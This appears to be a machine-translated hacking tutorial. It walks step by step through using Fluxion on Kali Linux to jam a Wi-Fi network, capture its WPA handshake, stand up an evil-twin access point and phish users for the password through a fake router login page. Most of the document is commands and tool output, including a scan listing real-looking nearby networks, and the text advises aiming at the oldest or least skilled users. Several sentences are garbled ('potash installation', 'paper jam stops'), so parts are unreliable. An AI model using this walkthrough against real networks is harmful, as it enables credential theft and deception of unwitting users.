Because tools like Reaver for pen testers are becoming less viable options as ISPs replace vulnerable routers, there is less and less certainty about which tools are appropriate for a particular target. If you do not have time to crack the WPA password, or if it's unusually strong, it can be difficult to figure out your next move. Fortunately, almost all systems have a common vulnerability that you can count on – users!
Social engineering goes beyond hardware and attacks the most vulnerable part of a system. One tool that makes this easy is Fluxion. Even the most anti-social hacker can hide behind a well-designed login page, and Fluxion automates the process of creating a fake access point to capture WPA passwords.
Users are almost always the weakest link in a system, and so attacks against them are often preferred because they are cheap and effective. Hardware concerns can often be ignored if users are not sufficiently familiar with the technology to fall for a social engineering attack. While social engineering attacks can strike flags in more technologically advanced organizations, phishing and spoofing attacks on users are the means of first choice for both nation-states and criminal hackers small and medium-sized businesses that focus on any industry other than technology focus. These companies typically have many vulnerable or unpatched systems with standard credentials that can be easily exploited over their wireless network and that are unlikely to know what an attack looks like.
How Fluxion Works A mix of technical and social automation that entices a user to pass the Wi-Fi password at the touch of a button. In particular, it's a social engineering framework that uses a nasty twin access point (AP), built-in jamming and handshake capture capabilities to ignore hardware and focus on the wetware. Tools such as Wifiphisher perform similar attacks but can not validate the specified WPA passwords.
Fluxion evolved from an advanced social engineering attack called Lindset, in which the first tool was written mainly in Spanish and had several bugs. Fluxion is a rewritten attack to make inexperienced users reveal the password / passphrase of the network.
Fluxion is a unique tool when using a WPA handshake to script not only the behavior of the logon page, but the behavior of the entire page. It blocks the original network and creates a clone with the same name that causes the disconnected user to join. This will display a fake login page stating that the router needs to reboot or load the firmware and requested the network password to continue. It's that simple.
The tool checks the entered password with a detected handshake and blocks the destination AP until the correct password is entered. Fluxion uses Aircrack-ng to live-check the results as they are typed in, and a successful result means the password is ours.
Tactically, this attack is only as good as the fake login screen. Many have been added to Fluxion since it was created, and it is possible to develop other screens with some research. In general, running this attack with standard login screens immediately draws the attention of a more experienced user or a tech-savvy organization. This attack is most effective when aimed at the one who is the oldest or least skilled in an organization. Sensitive access points with intrusion detection systems may detect this attack and try to block it by blocking your IP address in response to the built-in failure.
System Compatibility and Requirements
Fluxion works under Kali Linux. Just make sure you're fully up to date or running Kali Rolling to make sure the system and dependencies are up-to-date. You can run it on your dedicated potash installation in a virtual machine. If you're looking for a cheap, convenient platform, check out our Kali Linux Raspberry Pi build with the Raspberry Pi for $ 35. This tool does not work with SSH because other windows need to be opened.
For this to work we need a compatible WLAN adapter. Check out our 2019 list of Kali Linux compatible Wi-Fi adapters, or get our most popular adapter for beginners here. Make sure your wireless adapter that supports monitoring mode is plugged in and recognized by Kali and displayed when iwconfig or ifconfig is entered.
Capturing WPA Passwords with Fluxion  Our goal in this article is to reach an organization through their WPA-encrypted Wi-Fi connection. We will launch an attack against users who are connected to the probe point, capture a handshake, set up a cloned (bad twin) AP, block the target AP, set up a fake login page, and acknowledge the captured password against the handshake ,
The Fluxion developer recently shut down the product but you can get an older version of it to continue using it. To get the older version of Fluxion running on your Kali Linux system, clone the git repository with:
~ # git clone https://github.com/wi-fi-analyzer/fluxion Cloning in "Fluxion" ... remote: list objects: 2646, done. Remote: A total of 2646 (Delta 0), reused 0 (Delta 0), pack-reused 2646 Receive objects: 100% (2646/2646), 26.14 MiB | 83.00 KiB / s, done. Solving deltas: 100% (1433/1433), done.
Find missing dependencies by navigating to the folder and listing the content to see what's in it.
~ # cd fluxion ~ / fluxion # ls docs install lib logos siteinstaller.py Language locale fluxion.sh README.md sites
Then start it for the first time. You will probably see the following where some dependencies are needed.
~ / fluxion # sudo ./fluxion.sh [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future >] [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] aircrack-ng ..... OK! aireplay-ng ..... OK! airmon-ng ....... OK! airodump-ng ..... OK! awk ............. OK! Curl ............ OK! dhcpd ........... Not installed (isc-dhcp-server) hostapd ......... OK! iwconfig ........ OK! lighttpd ........ Not installed Macchanger ...... OK! mdk3 ............ OK! nmap ............ OK! php-cgi ......... Not installed pyrite ........... OK! Python .......... OK! unpack ........... OK! xterm ........... OK! openssl ......... OK! rfkill .......... OK! Strings ......... OK! Fuser ........... OK!
To get the needed dependencies and set your board to green, install the missing ones from the list. In my case these are dhcpd, lighttpd and php-cgi.
~ / fluxion # apt-get install dhcpd lighttpd php-cgi
If dhcpd installs udhcpd instead, run the following command to get the correct result.
~ / fluxion # apt-get install isc-dhcp-server
After all dependencies are met, the board is green and you can move to the attack surface. Run the Fluxion command again with sudo ./fluxion.sh to get hacking.
~ / fluxion # sudo ./fluxion.sh [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future >] [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]  Choose your language  English  German  Romanian  Turkish  Spanish  Chinese  Italian  Czech  Greek  French  Slovenian [deltaxflux@fluxion] - [~] 1
The first option is to select the language. Enter the number next to the desired one and press . Enter to get to the interface selection. Here you can see all connected network interfaces. Dial the number next to the number you want, in my case 1 for wlan2.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future > [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] Select an interface  wlan2 Atheros AR9271 ath9k  wlan1 Ralink RT2870 / 3070 rt2800usb  wlan0 Atheros AR9565 ath9k [deltaxflux@fluxion] - [~] 1
This will take you to the destination identification. If the channel of the network you want to attack is known, you can enter 2 to restrict the search to the desired channel. Otherwise, select 1 to scan all channels.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future > [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [i] Select channel  All channels  Certain channels  Back [deltaxflux@fluxion] - [~] 1
During this process, a window WiFi Monitor is opened. Let the scan capture wireless data for at least 30 seconds. The attack must be run for at least 30 seconds to verify that a client is connected to the network. Press ctrl-c or click the window (x) to end the capture process whenever you find the wireless network you want. Then the window is closed and the results are displayed again in the terminal.
Select a target with active clients to attack by typing the number next to it. Unless you are waiting for a client to connect (possibly for an extended period of time), this attack will not work on a non-client network. Who would we be fooled if we did not have anyone connected to the network?
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future > [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] Wi-LIST ID MAC CHAN SECU PWR ESSID  BC: F6: 85: 04: A9: 98 9 WPA2 26% ACR North  14: AB: F0: CC: 6E: 90 4 WPA2 30% cpc-office  B4: 75: 0E: B4: 54: DO 1 WPA2 34% JadeMagnolia  * E8: AD: A6: 55: 31: 9E 11 WPA 34%  E8: ED: 05: 7A: 4D: 70 6 WPA2 36% DG1670A72  A4: 2B: BO: E9: 5B: 6D 1 WPA2 34% MEDICO  28: 9E: FC: 62: 7A: E6 1 WPA2 37% MySpectrumWiFie0-2G  84: A0: 6E: C6: 93: CE 1 WPA2 37% MyspectrumWiFic8-2G  9C: A3: A9: 62: 7C: E4 14 WPA2 36% NVR9ca3a9627ce4  AC: 5D: 10: 4A: 95: 2A 11 WPA2 36% ATT304  8C: A2: FD: 00: 18: A5 6 WPA2 36% HungryCandy  BO: 98: 2B: 4E: 62: AE 1 WPA2 36% MySpectrumWiFia8-2G  A4: 08: F5: 70: 79: 8A 1 WPA2 36% MySpectrumWiFi84-2G  A0: 39: EE: 7E: 63: DA 1 WPA2 36% MINDEOK-2G  24: 79: 2A: 93: 50: 38 7 WPA2 34% TWCWiFi Passpoint  24: 79: 2A: 13: 50: 39 7 WPA2 34% SpectrumWiFi Plus  8C: A2: FD: 00: 05: 8E 6 WPA2 37% LavishBest  AC: EC: 80: 09: 65: CO 1 WPA 2 37% SHIN  00: AC: E0: 91: 65: 80 1 WPA2 39% SMQ 2.4  1A: 91: 82: 8E: DF: FB 4 WPA2 38%  B2: 52: 16: 21: 47: E9 4 WPA2 38% DIRECT-6SMFC-L5700DW_BR47e9  10: 05: 31: 32: BB: 30 11 WPA2 39% GoGo Foot  EC: 0E: C4: 73: 09: A7 1 WPA2 38% WIFI73C9A4  20: E5: 2A: 4D: A6: F2 1 WPA2 38% Netgear 100-2G  98: 6B: 3D: DF: 64: 50 6 WPA2 40% Not defined  8C: A2: FD: 00: 9C: AD 6 WPA2 39% Wittyslim  F4: 6B: EF: 30: 0F: OE 1 WPA2 40% PT STOP  38: 3B: C8: 02: 59: 66 4 WPA2 38% ATT386  8C: A2: FD: 01: 23: 28 6 WPA2 40% Donna 🙂  FE: EC: DA: A4: 06: 40 6 WPA2 40%  84: A0: 6E: C2: 0A: 2E 1 WPA2 41% MyspectrumWiFi28-2G  98: 6B: 3D: CA: 45: 70 9 WPA2 42% DG1670A72  14: 91: 82: 8E: DF: FB 4 WPA2 40% FBISurveillanceTruck  AC: E2: 03: 10: 75: 8A 5 WPA2 42% DIRECT-89-HP Officejet Pro 6970  OU: A2: FD: 01: 2B: 28 6 WPA2 41% Donna 🙂 _Guest  34: 6B: 46: 40: 5A: 5A 6 WPA2 42% MySpectrumWiFi54-2G  50: 33: 8B: 68: 2D: 74 1 WPA2 41%  1C: B9: 04: 6B: 6D: 53 3 WPA2 42% Island 2B6D50  8C: A2: FD: 00: 63: 41 6 WPA2 43% Stevefi  F4: 6B: EF: 1E: AA: C6 1 WPA2 43% Happy777-2G  1C: BO: 44: CD: 34: FO 5 WPA2 44% MySpectrumWiFif2-2G  AC: EC: 80: A8: F6: FO 6 WPA2 44% TG1672GF2  * 88: DC: 96: 55: 72: 00 1 WPA2 47% Anchor  BO: 6E: BF: DB: C1: B8 1 WPA2 45% claire  90: 1A: CA: 6C: 07: 00 1 WPA2 47% piccadilly  * 40: 20: 09: 2A: 64.90 11 WPA2 46% Spot 2.4 GHz  60: 19: 71: EE: A9: 20 11 WPA2 45% Seoultaxservice  OC: EA: C9: 77: 83: 00 11 WPA 46%  DO: 17: 02: B2: 06: 08 8 WPA2 48% ATI guest  60: 38: E0: 89: F5: 02 3 WPA2 47% thlee174  8C: FE: 74: 79: E3: 73 9 WPA2 46% Island 39E370  40: 70: 09: 74: 48: BO 6 WPA2 47% envy  28: 9E: FC: 62: 5B: 26 1 WPA2 48% MySpectrumWiFi20-2G  94: 91: 7F: 25: 41: B1 5 WPA2 58% SSooniestyle  C4: 01: 7C: 13: 10: 09 11 WPA2 60% TWCWiFi Passpoint  CC: 20: 21: 38: 33: 11 10 WPA2 36% DT TUTORING  AC: B3: 13: 07: 42: 70 11 WPA2 28% Vog Hair Salon-1  28: 9E: FC: 67: 61: 06 11 WPA2 40% MySpectrumWiF100-2G  DC: EF: 09: CD: 30: 37 11 WPA2 36% fobdawg_EXT  AC: B3: 13: 7A: 4A: 90 11 WPA2 38% Gryffindor  C4: 01: 7C: 53: 10: 08 11 WPA2 58% SpectrumWiFi Plus  8C: A2: FD: 01: 34: 46 6 WPA2 35% Chiefrutabaga  8C: A2: FD: 00: 41: B3 6 WPA2 35% NNND_NET  CO: C1: CO: B6: F3: 71 6 WPA2 39% SilverHorse  24: F5: A2: 2D: F8: 09 6 WPA2 36% LALASHOP2.4  60: 72: 20: 3D: B6: 50 6 WPA2 39% MBC NEW MEDIA SPACE  08: 02: 8E: BB: 18: 1B -1 WPA2 99% (*) Active customers Choose a destination. To rerun, type r [deltaxflux@fluxion] - [~] 46
Step 4: Select your attack.
If you entered the number of the destination network, in my case 46 press Enter . to load the network profile into the attack selection. For demonstration purposes I use option 1 to create a "FakeAP" with hostapd. This creates a spoofed hotspot that uses the collected information to clone the destination access point.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future >] [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] INFO WIFI SSID = point 2.4 GHz / WPA2 Channel = 11 Speed = 95 Mbps BSSID = 40: 70: 09: 7A: 64: 90 (ARRIS Group, Inc.)  Select Attack Option  FakeAP - Hostapd (Recommended)  FakeAP - Airbase-ng (slower connection)  Bruteforce - (handshake is required)  Back [deltaxflux@fluxion] - [~] 1
To verify that the password you have received works, you can compare it to a detected handshake. If you have a handshake, you can enter it in the next screen. If not, we can press the Enter key to force the network to handshake in the next step.
Location of the handshake (example: /root/fluxion.cap) Press the ENTER key to skip Path: [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future >] [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]  Handshake check  pyrite  aircrack-ng (Miss chance)  Back [deltaxflux@fluxion] - [~] 2
The screen for checking the handshake is displayed as shown above. When using the Aircrack-ng method by selecting option 2 Fluxion sends Deauthentication Packets to the destination AP as a client and listens for the resulting WPA handshake. But first you have to choose who you want to do, which I would recommend option 3 so that you only have the target and not everyone.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future > [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]  * detect handshake *  Deauth all  Disable All [mdk3]  Disable Destination  Scan the nets again  Exit [deltaxflux@fluxion] - [~] 3
Two windows are displayed, one for capturing data on the channel and one for de-authenticating the client . At the top of the first screen, make sure that the "WPA handshake" is displayed. If you see it, as shown at the top right of the screenshot below, you have captured the handshake.
Close both windows. Back in Terminal Type 1 for "Check handshake" and press Enter to load the handshake into your attack configuration.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future > [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]  * detect handshake * Status handshake:  Check handshake  Back  Choose a different network  Exit #> 1
Now create an SSL certificate, option 1 so you can pop up without raising an alarm and preventing the browser from navigating to it.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future >] [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] Certification invalid or missing, please select  Create an SSL certificate  Search for SSl certificate  Exit #> 1
Now it's time to create the fake login page. Select 1 for "Web Interface" to use the social engineering tool.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future > [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] INFO WIFI SSID = point 2.4 GHz / WPA2 Channel = 11 Speed = 95 Mbps BSSID = 40: 70: 09: 7A: 64: 90 (ARRIS Group, Inc.)  Choose your option  Web interface  Bruteforce  Exit #? 1
You will receive a menu with various fake login pages that you can offer to the user. These are customizable with some work, but should match the device and language. The default settings should be tested before use, as some are not very convincing. I have chosen an English Netgear attack option 27 .
This is the last step to arm the attack. Now you can start. Press Enter after selecting your language option to start the attack.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future > [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] INFO WIFI SSID = point 2.4 GHz / WPA2 Channel = 11 Speed = 95 Mbps BSSID = 40: 70: 09: 7A: 64: 90 (ARRIS Group, Inc.)  Select login page  English [ENG] (NEUTRA)  German [GER] (NEUTRA)  Russian [RUS] (NEUTRA)  Italian [IT] (NEUTRA)  Spanish [ESP] (NEUTRA)  Portuguese [POR] (NEUTRA)  Chinese [CN] (NEUTRA)  French [FR] (NEUTRA)  Turkish [TR] (NEUTRA)  Romanian [RO] (NEUTRA)  Hungarian [HU] (NEUTRA)  Arabic [ARA] (NEUTRA)  Greek [GR] (NEUTRA)  Czech [CZ] (NEUTRA)  Norwegian [NO] (NEUTRA)  Bulgarian [BG] (NEUTRA)  Serbian [SRB] (NEUTRA)  Polish [PL] (NEUTRA)  Indonesian [ID] (NEUTRA)  Dutch [NL]  Danish [DAN]  Hebrew [HE]  Thai [TH]  Portuguese [BR]  Slovenian [SVN]  Belkin [ENG]  Netgear [ENG]  Huawei [ENG]  Verizon [ENG]  Netgear [ESP]  Arris] Vodafone [ESP]  TP-Link [ENG]  Ziggo [NL]  KPN [NL]  Zigoo2016 [NL]  FRITZBOX_EN [DE]  FRITZBOX_ENG [ENG]  GENEXIS_DE [DE]  Login Netgear [19659099  Google  MOVISTAR [ESP]  Back #? 27 [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future >] [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [i] Attack is underway.  Choose another network  Exit #>
The attack opens multiple windows to create a cloned version of their wireless network while blocking the common access point. The user is tempted to join the network with the same name but without encryption.
Step 7: Capture the password  The user is notified of a fake logon page that either convinced or not, depending on which you have chosen.
If you enter an incorrect password, the handshake check fails and the user is prompted to try again. After entering the correct password, Aircrack-ng will check the password and save it in a text file as it is displayed on the screen. The user is directed to a "thank you" screen when the paper jam stops and the wrong access point is closed.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [ ] [FLUXION2< Fluxion Is The Future > [ ] [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [-] Cleaning and closing [-] Disable monitoring interface mon0 [-] Disable interface wlan1 [-] Disable forwarding of packets [-] Cleaning of iptables [-] Restore Tput [-] Delete files [-] Restarting Network Manager [-] Clean up done successfully! [+] Thank you for using Fluxion.
You can verify your success by checking the screen of the Aircrack-ng WiFi Information screen.
Congratulations, you've been able to get and verify a password by targeting the " Wetware "was provided. You've tricked a user into entering the password instead of relying on an existing security flaw.
Warning: This technique may be illegal without permission.
Fluxion legally combines scanning, cloning, creating a fake access point and creating a phishing logon screen and using the Aircrack-ng script to retrieve and crack WPA handshakes. As such, it leaves behind signatures in router protocols that are consistent with these techniques. Most of these practices are illegal and undesirable on any system you do not have permission to test.